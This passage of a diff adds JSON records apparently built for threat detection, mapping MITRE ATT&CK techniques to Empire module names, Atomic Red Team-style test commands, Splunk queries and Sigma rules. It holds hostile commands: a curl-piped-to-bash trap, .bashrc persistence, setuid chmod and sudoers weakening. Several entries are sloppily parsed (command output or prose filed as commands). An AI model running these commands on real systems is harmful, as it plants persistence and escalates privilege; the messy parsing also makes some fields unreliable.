"python/situational_awareness/host/osx/HijackScanner" + ], + "commands": [ + { + "command": "python/persistence/osx/CreateHijacker", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/host/osx/HijackScanner", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/persistence/osx/CreateHijacker", + "ATT&CK Technique #1": "T1157", + "ATT&CK Technique #2": "", + "Technique": "Dylib Hijacking", + "Concatenate for Python Dictionary": "\"python/persistence/osx/CreateHijacker\": [\"T1157\"]," + }, + { + "Empire Module": "python/situational_awareness/host/osx/HijackScanner", + "ATT&CK Technique #1": "T1157", + "ATT&CK Technique #2": "", + "Technique": "Dylib Hijacking", + "Concatenate for Python Dictionary": "\"python/situational_awareness/host/osx/HijackScanner\": [\"T1157\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1160", + "command_list": [ + "python/persistence/osx/launchdaemonexecutable" + ], + "commands": [ + { + "command": "python/persistence/osx/launchdaemonexecutable", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "python/persistence/osx/launchdaemonexecutable", + "ATT&CK Technique #1": "T1160", + "ATT&CK Technique #2": "", + "Technique": "Launch Daemon", + "Concatenate for Python Dictionary": "\"python/persistence/osx/launchdaemonexecutable\": [\"T1160\"]," + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1154", + "command_list": [ + "trap 'nohup curl -sS 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT", + "nohup is used for continuing program/script execution even after exit.", + "trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT" + ], + "commands": [ + { + "command": "trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "nohup is used for continuing program/script execution even after exit.", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history \"trap *\" | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1156", + "command_list": [ + "echo \"#{command_to_add}\" >> ~/.bashrc", + "echo \"#{command_to_add}\" >> ~/.bash_profile", + "echo \"/home/ec2-user/welcome.sh\" >>~/.bash_profile", + "echo \"/home/ec2-user/welcome.sh\" >>~/.bashrc" + ], + "commands": [ + { + "command": "echo \"#{command_to_add}\" >> ~/.bashrc", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"#{command_to_add}\" >> ~/.bash_profile", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"/home/ec2-user/welcome.sh\" >>~/.bash_profile", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "echo \"/home/ec2-user/welcome.sh\" >>~/.bashrc", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + 
"product": "Splunk", + "query": "index=linux sourcetype=linux_audit bashrc_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bashrc -p wa -k bashrc_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "-w /home/ec2-user/.bash_profile -p wa -k bashrc_changes", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"nano .bashrc\" OR bash_command=\"vi .bashrc\" OR echo .bashrc | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history bash_command=\"nano .bashrc_profile\" OR bash_command=\"vi .bashrc_profile\" OR echo .bashrc_profile | table host,user_name,bash_command", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "title": "Detects Suspicious edit of .bash_profile and .bashrc on Linux systems", + "id": "e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9", + "status": "experimental", + "description": "Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.", + "references": [ + "MITRE Attack technique T1156; .bash_profile and .bashrc. 
" + ], + "date": "2019/05/12", + "tags": [ + "attack.s0003", + "attack.t1156", + "attack.persistence" + ], + "author": "Peter Matkovski", + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection": { + "type": "PATH", + "name": [ + "/home/*/.bashrc", + "/home/*/.bash_profile", + "/home/*/.profile", + "/etc/profile", + "/etc/shells", + "/etc/bashrc", + "/etc/csh.cshrc", + "/etc/csh.login" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Admin or User activity" + ], + "level": "medium" + } + ], + "external_reference": [] + }, + { + "technique_id": "T1166", + "command_list": [ + "sudo chmod u+s hello", + "sudo chmod u+s #{file_to_setuid}", + "sudo chmod g+s #{file_to_setuid}" + ], + "commands": [ + { + "command": "sudo chmod u+s hello", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sudo chmod u+s #{file_to_setuid}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sudo chmod g+s #{file_to_setuid}", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=bash_history \"chmod 4***\" OR \"chmod 2***\" OR \"chmod u+s\" OR \"chmod g+s\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "find Setuid: find / -type f -perm /4000 OR find / -type f -perm /u+s", + "name": "" + }, + { + "product": "Splunk", + "query": "find Setgid: find / -type f -perm /2000 OR find / -type f -perm /g+s", + "name": "" + }, + { + "product": "Splunk", + "query": "Create a scripted input to ingest the files with Setuid and Setgid bits set and compare it with the expectde whitelist.", + "name": "" + } + ], + "possible_detections": [ + "bash_history", + "scripted_input" + ], + "external_reference": [] + }, + { + "technique_id": "T1009", + "command_list": [ + "dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}", + "```", + "sha1sum welcome.sh >before", + "dd 
if=/dev/zero bs=1 count=1 >> welcome.sh", + "<<", + "1+0 records in", + "1+0 records out", + "1 byte (1 B) copied, 0.000221464 s, 4.5 kB/s", + ">>", + "sha1sum welcome.sh >after", + "cmp before after", + "<>" + ], + "commands": [ + { + "command": "dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sha1sum welcome.sh >before", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "dd if=/dev/zero bs=1 count=1 >> welcome.sh", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "<<", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "1+0 records in", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "1+0 records out", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "1 byte (1 B) copied, 0.000221464 s, 4.5 kB/s", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": ">>", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sha1sum welcome.sh >after", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "cmp before after", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "<>", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "```index=linux sourcetype=\"bash_history\" bash_command=\"dd *\"```", + "name": "" + }, + { + "product": "Splunk", + "query": "", + "name": "" + } + ], + "possible_detections": [ + "```bash_history logs```", + { + "title": "Failed Code Integrity Checks", + "id": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "status": "stable", + "description": "Code integrity failures may indicate tampered executables.", + "author": "Thomas Patzke", + "tags": [ + "attack.defense_evasion", + "attack.t1009" + ], + "logsource": { + "product": "windows", + "service": 
"security" + }, + "detection": { + "selection": { + "EventID": [ + 5038, + 6281 + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Disk device errors" + ], + "level": "low" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File monitoring" + ], + [ + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/" + ] + }, + { + "technique_id": "T1222", + "command_list": [ + "```", + "chmod 766 test1.txt", + "chmod u+x test1.txt", + "chmod o-x test1.txt", + "chown ec2-user:ec2-user test1.txt" + ], + "commands": [ + { + "command": "```", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chmod 766 test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chmod u+x test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chmod o-x test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "chown ec2-user:ec2-user test1.txt", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=90 OR syscall=91 
OR sycall=268 | table msg,syscall,syscall_name,success,auid,comm,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=linux_audit syscall=92 OR syscall=93 OR syscall=94 OR syscall=260 comm!=splunkd | table", + "name": "" + }, + { + "product": "Splunk", + "query": "msg,syscall,syscall_name,success,auid,comm,exe", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -S chmod,fchmod,fchmodat -F auid>=1000 -F auid!=-1 -F key=perm_mod", + "name": "" + }, + { + "product": "Splunk", + "query": "-a always,exit -F arch=b64 -S chown,fchown,lchown,fchownat -F auid>=1000 -F auid!=-1 -F key=perm_mod", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"chmod *\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux sourcetype=\"bash_history\" bash_command=\"chown *\" | table host,user_name,bash_command", + "name": "" + }, + { + "product": "Splunk", + "query": "```", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + 
"source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script 
interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1169", + "command_list": [ + "cat /etc/sudoers", + "vim /etc/sudoers" + ], + "commands": [ + { + 
"command": "cat /etc/sudoers", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "vim /etc/sudoers", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" sudoers_change", + "name": "" + }, + { + "product": "Splunk", + "query": "Audit Rule : -w /etc/sudoers -p wa -k sudoers_change", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs", + { + "action": "global", + "title": "Sudo Privilege Escalation CVE-2019-14287", + "id": "f74107df-b6c6-4e80-bf00-4170b658162b", + "status": "experimental", + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "references": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546" + ], + "author": "Florian Roth", + "date": "2019/10/15", + "modified": "2019/10/20", + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1169" + ], + "logsource": { + "product": "linux" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "detection": { + "selection_keywords": [ + "* -u#*" + ], + "condition": "selection_keywords" + } + }, + { + "detection": { + "selection_user": { + "USER": [ + "#-*", + "#*4294967295" + ] + }, + "condition": "selection_user" + } + } + ], + "external_reference": [] + }, + { + "technique_id": "T1206", + "command_list": [ + "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"" + ], + "commands": [ + { + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"", + 
"source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [], + "queries": [ + { + "product": "Splunk", + "query": "index=linux sourcetype=\"linux_audit\" sudoers_change", + "name": "" + }, + { + "product": "Splunk", + "query": "Audit Rule : -w /etc/sudoers -p wa -k sudoers_change", + "name": "" + } + ], + "possible_detections": [ + "auditlogs (audit.rules)", + "bash_history logs" + ], + "external_reference": [] + }, + { + "technique_id": "T1071", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "title": "DNS TXT Answer with possible execution strings", + "id": "8ae51330-899c-4641-8125-e39f2e07da72", + "status": "experimental", + "description": "Detects strings used in command execution in DNS TXT Answer", + "references": [ + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1" + ], + "tags": [ + "attack.t1071" + ], + "author": "Markus Neis", + "date": "2018/08/08", + "logsource": { + "category": "dns" + }, + "detection": { + "selection": { + "record_type": "TXT", + "answer": [ + "*IEX*", + "*Invoke-Expression*", + "*cmd.exe*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Network intrusion detection system" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + 
"https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www.group-ib.com/blog/cobalt", + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://securelist.com/luckymouse-hits-national-data-center/86083/", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + null + ] + }, 
